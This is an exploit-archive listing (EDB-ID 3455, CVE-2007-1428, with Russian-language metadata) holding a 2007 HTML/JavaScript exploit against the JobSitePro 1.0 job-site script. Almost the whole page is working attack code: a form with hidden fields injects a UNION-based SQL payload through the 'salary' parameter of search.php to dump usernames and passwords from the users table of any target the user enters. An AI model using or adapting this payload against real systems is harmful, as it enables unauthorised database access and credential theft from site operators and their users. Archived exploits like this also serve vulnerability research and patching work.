Exploit JobSitePro 1.0 - 'search.php' SQL Injection

[Exploiter]

EDB-ID

3455

Проверка EDB

1. Пройдено

Автор

AJANN

Тип уязвимости

WEBAPPS

Платформа

PHP

CVE

cve-2007-1428

Дата публикации

2007-03-11

<html>
<head>

<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">

</head>
<body>
<div>
<script language="JavaScript">
//Coded by ajann

//'===============================================================================================
//'[Script Name: JobSitePro 1.0 (search.php) Remote BLIND SQL Injection Exploit
//'[Coded by   : ajann
//'[Author     : ajann
//'[Contact    : :(
//'[S.Page     : http://phplabs.com/
//'[$$         : 39.95 $
//'[Using      : Write Target after Submit Click
//'===============================================================================================


tittle='JobSitePro 1.0 (search.php) Remote BLIND SQL Injection Exploit'
value='"';
sql='1 union select 1,concat(char(117,115,101,114,110,97,109,101,58),username,char(112,97,115,115,58),password),3 from users/*';
valueclose='">';

attack=value+sql+valueclose;
document.write('<title>' + tittle + '</title>')
document.write('<body bgcolor="#000000">');
document.write('<p><b><font face="Verdana" size="2" color="#008000">' + tittle + '</font></b></p>');
document.write('<form method="post" name="form1" action="http://phplabs.com/demo/jobsitepro/search.php" enctype="multipart/form-data" onSubmit="send();">');
document.write('<b><font color="#008000"><font face="Verdana" size="1">Target</font><font face="Verdana" size="1">[site.com/path]:</font></font></b>');
document.write('<form method="post" name="form1" action="a" enctype="multipart/form-data">')
document.write('&nbsp;&nbsp;&nbsp;')
document.write('<input type="text" name="hedef" value="http://" onChange="control();">')
document.write('<SELECT name="jobtype" style="visibility: hidden;">')
document.write('<OPTION value="all" SELECTED>All Categories</OPTION>')
document.write('</SELECT>')
document.write('<input name="city" type="text" id="city" size="45" style="visibility: hidden;">')
document.write('<select name="state" style="visibility: hidden;">')
document.write('<option value="all" selected>')
document.write('</option>')
document.write('</select>')
document.write('<select name="country" style="visibility: hidden;">')
document.write('<option value="US" selected>United States </option>')
document.write('</select>')
document.write('<input name="keywords" type="text" id="keywords" value=" " style="visibility: hidden;">')
document.write('<input name="boolean" type="radio" value="any" checked style="visibility: hidden;">')
document.write('<select name="date" id="date" style="visibility: hidden;">')
document.write('<option value="all" selected>List All Jobs</option>')
document.write('</select>')
document.write('<select name="exempt" id="exempt" style="visibility: hidden;">')
document.write('<option value="all" selected>Any</option>')
document.write('</select>')
document.write('<input name="salary" style="visibility: hidden;" type="text" id="salary" size="10" value=' + attack)
document.write('<select name="perpage" id="perpage" style="visibility: hidden;">')
document.write('<option value="25" selected>25</option>')
document.write('</select>')
document.write('<input name="act" type="hidden" id="act" value="dosearch">')
document.write('<br><input type="submit" name="Submit" value="Attack!!!!"')
document.write('</form>')

   function control() {

 if (document.form1.hedef.value==""){
          alert("Please all fields correct!");
      
 }
  }


 function send() {

target=document.form1.hedef.value;
file='search.php';
document.form1.action=target+file;



   }



</script>

</div>

</body>
</html>

# milw0rm.com [2007-03-11]